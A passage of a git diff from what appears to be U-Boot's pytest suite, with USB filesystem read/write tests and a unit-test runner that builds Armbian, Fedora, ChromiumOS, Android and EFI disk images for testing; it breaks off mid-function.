devices[i]['fat'] = part_fat + + if not part_ext2 and not part_ext4 and not part_fat: + pytest.fail('No partition detected on device %d' % i) + + return devices, controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fat') +def test_usb_fatls_fatinfo(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + output = ubman.run_command('fatls usb %d:%s' % (x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + + if not re.search(r'\d file\(s\), \d dir\(s\)', output): + pytest.fail('%s read failed on device %d' % (fs.upper, x)) + + output = ubman.run_command('fatinfo usb %d:%s' % (x, part)) + string = 'Filesystem: %s' % fs.upper + if re.search(string, output): + pytest.fail('%s FS failed on device %d' % (fs.upper(), x)) + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +def usb_fatload_fatwrite(ubman, fs, x, part): + addr = utils.find_ram_base(ubman) + size = random.randint(4, 1 * 1024 * 1024) + output = ubman.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + + file = '%s_%d' % ('uboot_test', size) + output = ubman.run_command( + '%swrite usb %d:%s %x %s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + alignment = int( + ubman.config.buildconfig.get( + 'config_sys_cacheline_size', 128 + ) + ) + offset = 
random.randrange(alignment, 1024, alignment) + output = ubman.run_command( + '%sload usb %d:%s %x %s' % (fs, x, part, addr + offset, file) + ) + assert 'Invalid FAT entry' not in output + assert 'Unable to read file' not in output + assert 'Misaligned buffer address' not in output + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + return file, size, expected_crc32 + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_fatload_fatwrite(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + usb_fatload_fatwrite(ubman, fs, x, part) + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext4') +def test_usb_ext4ls(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + ubman.run_command('usb dev %d' % x) + for part in partitions: + output = ubman.run_command('%sls usb %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +def usb_ext4load_ext4write(ubman, fs, x, part): + addr = utils.find_ram_base(ubman) + size = random.randint(4, 1 * 1024 * 1024) + output = ubman.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + file = '%s_%d' % ('uboot_test', size) + + output = ubman.run_command( + '%swrite usb %d:%s %x /%s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + '%sload usb %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + return file, size, expected_crc32 + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('cmd_ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_ext4load_ext4write(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s 
table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + usb_ext4load_ext4write(ubman, fs, x, part) + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext2') +def test_usb_ext2ls(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = ubman.run_command('%sls usb %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext2') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('cmd_ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_usb_ext2load(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + file, size, expected_crc32 = \ + usb_ext4load_ext4write(ubman, fs, x, part) + addr = utils.find_ram_base(ubman) + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + '%sload usb %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_ls(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + for fs in ['fat', 'ext2', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = ubman.run_command('ls usb %d:%s' % (x, part)) + if re.search(r'No \w+ table on this device', output): + pytest.fail( + '%s: Partition table not found %d' % (fs.upper(), x) + ) + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_ext4_write') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_load(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + for fs in ['fat', 'ext2', 'ext4']: + try: + partitions = devices[x][fs] + except: + 
print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = utils.find_ram_base(ubman) + + if fs == 'fat': + file, size, expected_crc32 = \ + usb_fatload_fatwrite(ubman, fs, x, part) + elif fs in ['ext4', 'ext2']: + file, size, expected_crc32 = \ + usb_ext4load_ext4write(ubman, fs, x, part) + else: + raise Exception('Unsupported filesystem type %s' % fs) + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + 'load usb %d:%s %x /%s' % (x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = ubman.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_usb_save(ubman): + devices, controllers, storage_device = test_usb_part(ubman) + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, int(storage_device)): + if devices[x]['detected'] == 'yes': + ubman.run_command('usb dev %d' % x) + for fs in ['fat', 'ext2', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = utils.find_ram_base(ubman) + size = random.randint(4, 1 * 1024 * 1024) + file = '%s_%d' % ('uboot_test', size) + + offset = random.randrange(128, 1024, 128) + output = ubman.run_command( + 'save usb %d:%s %x /%s %x' + % (x, part, addr + offset, file, size) + ) + expected_text = '%d bytes written' % size + assert expected_text in output + + if not part_detect: + pytest.skip('No partition detected') diff --git a/test/py/tests/test_ut.py b/test/py/tests/test_ut.py new file mode 100644 index 00000000000..ea0c43cd4fc --- /dev/null +++ b/test/py/tests/test_ut.py @@ -0,0 +1,610 @@ +# SPDX-License-Identifier: GPL-2.0 +""" +Unit-test runner + +Provides a test_ut() function which is used by conftest.py to run each unit +test one at a time, as well setting up some files needed by the tests. + +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. +""" +import collections +import gzip +import os +import os.path +import pytest + +import utils +# pylint: disable=E0611 +from tests import fs_helper +from test_android import test_abootimg + +def mkdir_cond(dirname): + """Create a directory if it doesn't already exist + + Args: + dirname (str): Name of directory to create + """ + if not os.path.exists(dirname): + os.mkdir(dirname) + +def setup_image(ubman, devnum, part_type, img_size=20, second_part=False, + basename='mmc'): + """Create a disk image with a single partition + + Args: + ubman (ConsoleBase): Console to use + devnum (int): Device number to use, e.g. 1 + part_type (int): Partition type, e.g. 0xc for FAT32 + img_size (int): Image size in MiB + second_part (bool): True to contain a small second partition + basename (str): Base name to use in the filename, e.g. 
'mmc' + + Returns: + tuple: + str: Filename of MMC image + str: Directory name of scratch directory + """ + fname = os.path.join(ubman.config.source_dir, f'{basename}{devnum}.img') + mnt = os.path.join(ubman.config.persistent_data_dir, 'scratch') + mkdir_cond(mnt) + + spec = f'type={part_type:x}, size={img_size - 2}M, start=1M, bootable' + if second_part: + spec += '\ntype=c' + + utils.run_and_log(ubman, f'qemu-img create {fname} 20M') + utils.run_and_log(ubman, f'sfdisk {fname}', + stdin=spec.encode('utf-8')) + return fname, mnt + +def setup_bootmenu_image(ubman): + """Create a 20MB disk image with a single ext4 partition + + This is modelled on Armbian 22.08 Jammy + """ + mmc_dev = 4 + fname, mnt = setup_image(ubman, mmc_dev, 0x83) + + script = '''# DO NOT EDIT THIS FILE +# +# Please edit /boot/armbianEnv.txt to set supported parameters +# + +setenv load_addr "0x9000000" +setenv overlay_error "false" +# default values +setenv rootdev "/dev/mmcblk%dp1" +setenv verbosity "1" +setenv console "both" +setenv bootlogo "false" +setenv rootfstype "ext4" +setenv docker_optimizations "on" +setenv earlycon "off" + +echo "Boot script loaded from ${devtype} ${devnum}" + +if test -e ${devtype} ${devnum} ${prefix}armbianEnv.txt; then + load ${devtype} ${devnum} ${load_addr} ${prefix}armbianEnv.txt + env import -t ${load_addr} ${filesize} +fi + +if test "${logo}" = "disabled"; then setenv logo "logo.nologo"; fi + +if test "${console}" = "display" || test "${console}" = "both"; then setenv consoleargs "console=tty1"; fi +if test "${console}" = "serial" || test "${console}" = "both"; then setenv consoleargs "console=ttyS2,1500000 ${consoleargs}"; fi +if test "${earlycon}" = "on"; then setenv consoleargs "earlycon ${consoleargs}"; fi +if test "${bootlogo}" = "true"; then setenv consoleargs "bootsplash.bootfile=bootsplash.armbian ${consoleargs}"; fi + +# get PARTUUID of first partition on SD/eMMC the boot script was loaded from +if test "${devtype}" = "mmc"; then part uuid mmc ${devnum}:1 partuuid; fi + +setenv bootargs "root=${rootdev} rootwait rootfstype=${rootfstype} ${consoleargs} consoleblank=0 loglevel=${verbosity} ubootpart=${partuuid} usb-storage.quirks=${usbstoragequirks} ${extraargs} ${extraboardargs}" + +if test "${docker_optimizations}" = "on"; then setenv bootargs "${bootargs} cgroup_enable=cpuset cgroup_memory=1 cgroup_enable=memory swapaccount=1"; fi + +load ${devtype} ${devnum} ${ramdisk_addr_r} ${prefix}uInitrd +load ${devtype} ${devnum} ${kernel_addr_r} ${prefix}Image + +load ${devtype} ${devnum} ${fdt_addr_r} ${prefix}dtb/${fdtfile} +fdt addr ${fdt_addr_r} +fdt resize 65536 +for overlay_file in ${overlays}; do + if load ${devtype} ${devnum} ${load_addr} ${prefix}dtb/rockchip/overlay/${overlay_prefix}-${overlay_file}.dtbo; then + echo "Applying kernel provided DT overlay ${overlay_prefix}-${overlay_file}.dtbo" + fdt apply ${load_addr} || setenv overlay_error "true" + fi +done +for overlay_file in ${user_overlays}; do + if load ${devtype} ${devnum} ${load_addr} ${prefix}overlay-user/${overlay_file}.dtbo; then + echo "Applying user provided DT overlay ${overlay_file}.dtbo" + fdt apply ${load_addr} || setenv overlay_error "true" + fi +done +if test "${overlay_error}" = "true"; then + echo "Error applying DT overlays, restoring original DT" + load ${devtype} ${devnum} ${fdt_addr_r} ${prefix}dtb/${fdtfile} +else + if load ${devtype} ${devnum} ${load_addr} ${prefix}dtb/rockchip/overlay/${overlay_prefix}-fixup.scr; then + echo "Applying kernel provided DT fixup script 
(${overlay_prefix}-fixup.scr)" + source ${load_addr} + fi + if test -e ${devtype} ${devnum} ${prefix}fixup.scr; then + load ${devtype} ${devnum} ${load_addr} ${prefix}fixup.scr + echo "Applying user provided fixup script (fixup.scr)" + source ${load_addr} + fi +fi +booti ${kernel_addr_r} ${ramdisk_addr_r} ${fdt_addr_r} + +# Recompile with: +# mkimage -C none -A arm -T script -d /boot/boot.cmd /boot/boot.scr +''' + bootdir = os.path.join(mnt, 'boot') + mkdir_cond(bootdir) + cmd_fname = os.path.join(bootdir, 'boot.cmd') + scr_fname = os.path.join(bootdir, 'boot.scr') + with open(cmd_fname, 'w', encoding='ascii') as outf: + print(script, file=outf) + + infname = os.path.join(ubman.config.source_dir, + 'test/py/tests/bootstd/armbian.bmp.xz') + bmp_file = os.path.join(bootdir, 'boot.bmp') + utils.run_and_log( + ubman, + ['sh', '-c', f'xz -dc {infname} >{bmp_file}']) + + mkimage = ubman.config.build_dir + '/tools/mkimage' + utils.run_and_log( + ubman, f'{mkimage} -C none -A arm -T script -d {cmd_fname} {scr_fname}') + + kernel = 'vmlinuz-5.15.63-rockchip64' + target = os.path.join(bootdir, kernel) + with open(target, 'wb') as outf: + print('kernel', outf) + + symlink = os.path.join(bootdir, 'Image') + if os.path.exists(symlink): + os.remove(symlink) + utils.run_and_log( + ubman, f'echo here {kernel} {symlink}') + os.symlink(kernel, symlink) + + fsfile = 'ext18M.img' + utils.run_and_log(ubman, f'fallocate -l 18M {fsfile}') + utils.run_and_log(ubman, f'mkfs.ext4 {fsfile} -d {mnt}') + utils.run_and_log(ubman, f'dd if={fsfile} of={fname} bs=1M seek=1') + utils.run_and_log(ubman, f'rm -rf {mnt}') + utils.run_and_log(ubman, f'rm -f {fsfile}') + +def setup_bootflow_image(ubman): + """Create a 20MB disk image with a single FAT partition""" + mmc_dev = 1 + fname, mnt = setup_image(ubman, mmc_dev, 0xc, second_part=True) + + vmlinux = 'vmlinuz-5.3.7-301.fc31.armv7hl' + initrd = 'initramfs-5.3.7-301.fc31.armv7hl.img' + dtbdir = 'dtb-5.3.7-301.fc31.armv7hl' + script = '''# extlinux.conf generated by appliance-creator +ui menu.c32 +menu autoboot Welcome to Fedora-Workstation-armhfp-31-1.9. Automatic boot in # second{,s}. Press a key for options. +menu title Fedora-Workstation-armhfp-31-1.9 Boot Options. 
+menu hidden +timeout 20 +totaltimeout 600 + +label Fedora-Workstation-armhfp-31-1.9 (5.3.7-301.fc31.armv7hl) + kernel /%s + append ro root=UUID=9732b35b-4cd5-458b-9b91-80f7047e0b8a rhgb quiet LANG=en_US.UTF-8 cma=192MB cma=256MB + fdtdir /%s/ + initrd /%s''' % (vmlinux, dtbdir, initrd) + ext = os.path.join(mnt, 'extlinux') + mkdir_cond(ext) + + conf = os.path.join(ext, 'extlinux.conf') + with open(conf, 'w', encoding='ascii') as fd: + print(script, file=fd) + + inf = os.path.join(ubman.config.persistent_data_dir, 'inf') + with open(inf, 'wb') as fd: + fd.write(gzip.compress(b'vmlinux')) + mkimage = ubman.config.build_dir + '/tools/mkimage' + utils.run_and_log( + ubman, f'{mkimage} -f auto -d {inf} {os.path.join(mnt, vmlinux)}') + + with open(os.path.join(mnt, initrd), 'w', encoding='ascii') as fd: + print('initrd', file=fd) + + mkdir_cond(os.path.join(mnt, dtbdir)) + + dtb_file = os.path.join(mnt, f'{dtbdir}/sandbox.dtb') + utils.run_and_log( + ubman, f'dtc -o {dtb_file}', stdin=b'/dts-v1/; / {};') + + fsfile = 'vfat18M.img' + utils.run_and_log(ubman, f'fallocate -l 18M {fsfile}') + utils.run_and_log(ubman, f'mkfs.vfat {fsfile}') + utils.run_and_log(ubman, ['sh', '-c', f'mcopy -i {fsfile} {mnt}/* ::/']) + utils.run_and_log(ubman, f'dd if={fsfile} of={fname} bs=1M seek=1') + utils.run_and_log(ubman, f'rm -rf {mnt}') + utils.run_and_log(ubman, f'rm -f {fsfile}') + +def setup_cros_image(ubman): + """Create a 20MB disk image with ChromiumOS partitions""" + Partition = collections.namedtuple('part', 'start,size,name') + parts = {} + disk_data = None + + def pack_kernel(ubman, arch, kern, dummy): + """Pack a kernel containing some fake data + + Args: + ubman (ConsoleBase): Console to use + arch (str): Architecture to use ('x86' or 'arm') + kern (str): Filename containing kernel + dummy (str): Dummy filename to use for config and bootloader + + Return: + bytes: Packed-kernel data + """ + kern_part = os.path.join(ubman.config.result_dir, + f'kern-part-{arch}.bin') + utils.run_and_log( + ubman, + f'futility vbutil_kernel --pack {kern_part} ' + '--keyblock doc/chromium/files/devkeys/kernel.keyblock ' + '--signprivate doc/chromium/files/devkeys/kernel_data_key.vbprivk ' + f'--version 1 --config {dummy} --bootloader {dummy} ' + f'--vmlinuz {kern}') + + with open(kern_part, 'rb') as inf: + kern_part_data = inf.read() + return kern_part_data + + def set_part_data(partnum, data): + """Set the contents of a disk partition + + This updates disk_data by putting data in the right place + + Args: + partnum (int): Partition number to set + data (bytes): Data for that partition + """ + nonlocal disk_data + + start = parts[partnum].start * sect_size + disk_data = disk_data[:start] + data + disk_data[start + len(data):] + + mmc_dev = 5 + fname = os.path.join(ubman.config.source_dir, f'mmc{mmc_dev}.img') + utils.run_and_log(ubman, f'qemu-img create {fname} 20M') + utils.run_and_log(ubman, f'cgpt create {fname}') + + uuid_state = 'ebd0a0a2-b9e5-4433-87c0-68b6b72699c7' + uuid_kern = 'fe3a2a5d-4f32-41a7-b725-accc3285a309' + uuid_root = '3cb8e202-3b7e-47dd-8a3c-7ff2a13cfcec' + uuid_rwfw = 'cab6e88e-abf3-4102-a07a-d4bb9be3c1d3' + uuid_reserved = '2e0a753d-9e48-43b0-8337-b15192cb1b5e' + uuid_efi = 'c12a7328-f81f-11d2-ba4b-00a0c93ec93b' + + ptr = 40 + + # Number of sectors in 1MB + sect_size = 512 + sect_1mb = (1 << 20) // sect_size + + required_parts = [ + {'num': 0xb, 'label':'RWFW', 'type': uuid_rwfw, 'size': '1'}, + {'num': 6, 'label':'KERN_C', 'type': uuid_kern, 'size': '1'}, + {'num': 7, 'label':'ROOT_C', 'type': 
uuid_root, 'size': '1'}, + {'num': 9, 'label':'reserved', 'type': uuid_reserved, 'size': '1'}, + {'num': 0xa, 'label':'reserved', 'type': uuid_reserved, 'size': '1'}, + + {'num': 2, 'label':'KERN_A', 'type': uuid_kern, 'size': '1M'}, + {'num': 4, 'label':'KERN_B', 'type': uuid_kern, 'size': '1M'}, + + {'num': 8, 'label':'OEM', 'type': uuid_state, 'size': '1M'}, + {'num': 0xc, 'label':'EFI-SYSTEM', 'type': uuid_efi, 'size': '1M'}, + + {'num': 5, 'label':'ROOT_B', 'type': uuid_root, 'size': '1'}, + {'num': 3, 'label':'ROOT_A', 'type': uuid_root, 'size': '1'}, + {'num': 1, 'label':'STATE', 'type': uuid_state, 'size': '1M'}, + ] + + for part in required_parts: + size_str = part['size'] + if 'M' in size_str: + size = int(size_str[:-1]) * sect_1mb + else: + size = int(size_str) + utils.run_and_log( + ubman, + f"cgpt add -i {part['num']} -b {ptr} -s {size} -t {part['type']} {fname}") + ptr += size + + utils.run_and_log(ubman, f'cgpt boot -p {fname}') + out = utils.run_and_log(ubman, f'cgpt show -q {fname}') + + # We expect something like this: + # 8239 2048 1 Basic data + # 45 2048 2 ChromeOS kernel + # 8238 1 3 ChromeOS rootfs + # 2093 2048 4 ChromeOS kernel + # 8237 1 5 ChromeOS rootfs + # 41 1 6 ChromeOS kernel + # 42 1 7 ChromeOS rootfs + # 4141 2048 8 Basic data + # 43 1 9 ChromeOS reserved + # 44 1 10 ChromeOS reserved + # 40 1 11 ChromeOS firmware + # 6189 2048 12 EFI System Partition + + # Create a dict (indexed by partition number) containing the above info + for line in out.splitlines(): + start, size, num, name = line.split(maxsplit=3) + parts[int(num)] = Partition(int(start), int(size), name) + + # Set up the kernel command-line + dummy = os.path.join(ubman.config.result_dir, 'dummy.txt') + with open(dummy, 'wb') as outf: + outf.write(b'BOOT_IMAGE=/vmlinuz-5.15.0-121-generic root=/dev/nvme0n1p1 ro quiet splash vt.handoff=7') + + # For now we just use dummy kernels. This limits testing to just detecting + # a signed kernel. We could add support for the x86 data structures so that + # testing could cover getting the cmdline, setup.bin and other pieces. 
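As an aside, the sector arithmetic behind set_part_data() is easy to sanity-check by reading the finished image back: a partition's contents start at start-sector * 512. A minimal, purely illustrative sketch (read_part() is a hypothetical helper, not part of this patch):

def read_part(fname, parts, partnum, length, sect_size=512):
    """Read 'length' bytes from the start of partition 'partnum' of image 'fname'"""
    with open(fname, 'rb') as inf:
        inf.seek(parts[partnum].start * sect_size)   # same offset maths as set_part_data()
        return inf.read(length)

# e.g. once set_part_data(2, ...) below has run, read_part(fname, parts, 2, 16)
# should return the first bytes of the packed x86 kernel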
+ kern = os.path.join(ubman.config.result_dir, 'kern.bin') + with open(kern, 'wb') as outf: + outf.write(b'kernel\n') + + with open(fname, 'rb') as inf: + disk_data = inf.read() + + # put x86 kernel in partition 2 and arm one in partition 4 + set_part_data(2, pack_kernel(ubman, 'x86', kern, dummy)) + set_part_data(4, pack_kernel(ubman, 'arm', kern, dummy)) + + with open(fname, 'wb') as outf: + outf.write(disk_data) + + return fname + +def setup_android_image(ubman): + """Create a 20MB disk image with Android partitions""" + Partition = collections.namedtuple('part', 'start,size,name') + parts = {} + disk_data = None + + def set_part_data(partnum, data): + """Set the contents of a disk partition + + This updates disk_data by putting data in the right place + + Args: + partnum (int): Partition number to set + data (bytes): Data for that partition + """ + nonlocal disk_data + + start = parts[partnum].start * sect_size + disk_data = disk_data[:start] + data + disk_data[start + len(data):] + + mmc_dev = 7 + fname = os.path.join(ubman.config.source_dir, f'mmc{mmc_dev}.img') + utils.run_and_log(ubman, f'qemu-img create {fname} 20M') + utils.run_and_log(ubman, f'cgpt create {fname}') + + ptr = 40 + + # Number of sectors in 1MB + sect_size = 512 + sect_1mb = (1 << 20) // sect_size + + required_parts = [ + {'num': 1, 'label':'misc', 'size': '1M'}, + {'num': 2, 'label':'boot_a', 'size': '4M'}, + {'num': 3, 'label':'boot_b', 'size': '4M'}, + {'num': 4, 'label':'vendor_boot_a', 'size': '4M'}, + {'num': 5, 'label':'vendor_boot_b', 'size': '4M'}, + ] + + for part in required_parts: + size_str = part['size'] + if 'M' in size_str: + size = int(size_str[:-1]) * sect_1mb + else: + size = int(size_str) + utils.run_and_log( + ubman, + f"cgpt add -i {part['num']} -b {ptr} -s {size} -l {part['label']} -t basicdata {fname}") + ptr += size + + utils.run_and_log(ubman, f'cgpt boot -p {fname}') + out = utils.run_and_log(ubman, f'cgpt show -q {fname}') + + # Create a dict (indexed by partition number) containing the above info + for line in out.splitlines(): + start, size, num, name = line.split(maxsplit=3) + parts[int(num)] = Partition(int(start), int(size), name) + + with open(fname, 'rb') as inf: + disk_data = inf.read() + + test_abootimg.AbootimgTestDiskImage(ubman, 'bootv4.img', test_abootimg.boot_img_hex) + boot_img = os.path.join(ubman.config.result_dir, 'bootv4.img') + with open(boot_img, 'rb') as inf: + set_part_data(2, inf.read()) + + test_abootimg.AbootimgTestDiskImage(ubman, 'vendor_boot.img', test_abootimg.vboot_img_hex) + vendor_boot_img = os.path.join(ubman.config.result_dir, 'vendor_boot.img') + with open(vendor_boot_img, 'rb') as inf: + set_part_data(4, inf.read()) + + with open(fname, 'wb') as outf: + outf.write(disk_data) + + print(f'wrote to {fname}') + + mmc_dev = 8 + fname = os.path.join(ubman.config.source_dir, f'mmc{mmc_dev}.img') + utils.run_and_log(ubman, f'qemu-img create {fname} 20M') + utils.run_and_log(ubman, f'cgpt create {fname}') + + ptr = 40 + + # Number of sectors in 1MB + sect_size = 512 + sect_1mb = (1 << 20) // sect_size + + required_parts = [ + {'num': 1, 'label':'misc', 'size': '1M'}, + {'num': 2, 'label':'boot_a', 'size': '4M'}, + {'num': 3, 'label':'boot_b', 'size': '4M'}, + ] + + for part in required_parts: + size_str = part['size'] + if 'M' in size_str: + size = int(size_str[:-1]) * sect_1mb + else: + size = int(size_str) + utils.run_and_log( + ubman, + f"cgpt add -i {part['num']} -b {ptr} -s {size} -l {part['label']} -t basicdata {fname}") + ptr += size + + 
utils.run_and_log(ubman, f'cgpt boot -p {fname}') + out = utils.run_and_log(ubman, f'cgpt show -q {fname}') + + # Create a dict (indexed by partition number) containing the above info + for line in out.splitlines(): + start, size, num, name = line.split(maxsplit=3) + parts[int(num)] = Partition(int(start), int(size), name) + + with open(fname, 'rb') as inf: + disk_data = inf.read() + + test_abootimg.AbootimgTestDiskImage(ubman, 'boot.img', test_abootimg.img_hex) + boot_img = os.path.join(ubman.config.result_dir, 'boot.img') + with open(boot_img, 'rb') as inf: + set_part_data(2, inf.read()) + + with open(fname, 'wb') as outf: + outf.write(disk_data) + + print(f'wrote to {fname}') + + return fname + +def setup_cedit_file(ubman): + """Set up a .dtb file for use with testing expo and configuration editor""" + infname = os.path.join(ubman.config.source_dir, + 'test/boot/files/expo_layout.dts') + inhname = os.path.join(ubman.config.source_dir, + 'test/boot/files/expo_ids.h') + expo_tool = os.path.join(ubman.config.source_dir, 'tools/expo.py') + outfname = 'cedit.dtb' + utils.run_and_log( + ubman, f'{expo_tool} -e {inhname} -l {infname} -o {outfname}') + +@pytest.mark.buildconfigspec('ut_dm') +def test_ut_dm_init(ubman): + """Initialize data for ut dm tests.""" + + fn = ubman.config.source_dir + '/testflash.bin' + if not os.path.exists(fn): + data = b'this is a test' + data += b'\x00' * ((4 * 1024 * 1024) - len(data)) + with open(fn, 'wb') as fh: + fh.write(data) + + fn = ubman.config.source_dir + '/spi.bin' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + + # Create a file with a single partition + fn = ubman.config.source_dir + '/scsi.img' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + utils.run_and_log( + ubman, f'sfdisk {fn}', stdin=b'type=83') + + fs_helper.mk_fs(ubman.config, 'ext2', 0x200000, '2MB', None) + fs_helper.mk_fs(ubman.config, 'fat32', 0x100000, '1MB', None) + + mmc_dev = 6 + fn = os.path.join(ubman.config.source_dir, f'mmc{mmc_dev}.img') + data = b'\x00' * (12 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + + +def setup_efi_image(ubman): + """Create a 20MB disk image with an EFI app on it""" + devnum = 1 + basename = 'flash' + fname, mnt = setup_image(ubman, devnum, 0xc, second_part=True, + basename=basename) + + efi_dir = os.path.join(mnt, 'EFI') + mkdir_cond(efi_dir) + bootdir = os.path.join(efi_dir, 'BOOT') + mkdir_cond(bootdir) + efi_src = os.path.join(ubman.config.build_dir, + 'lib/efi_loader/testapp.efi') + efi_dst = os.path.join(bootdir, 'BOOTSBOX.EFI') + with open(efi_src, 'rb') as inf: + with open(efi_dst, 'wb') as outf: + outf.write(inf.read()) + fsfile = 'vfat18M.img' + utils.run_and_log(ubman, f'fallocate -l 18M {fsfile}') + utils.run_and_log(ubman, f'mkfs.vfat {fsfile}') + utils.run_and_log(ubman, ['sh', '-c', f'mcopy -vs -i {fsfile} {mnt}/* ::/']) + utils.run_and_log(ubman, f'dd if={fsfile} of={fname} bs=1M seek=1') + utils.run_and_log(ubman, f'rm -rf {mnt}') + utils.run_and_log(ubman, f'rm -f {fsfile}') + +@pytest.mark.buildconfigspec('cmd_bootflow') +@pytest.mark.buildconfigspec('sandbox') +def test_ut_dm_init_bootstd(ubman): + 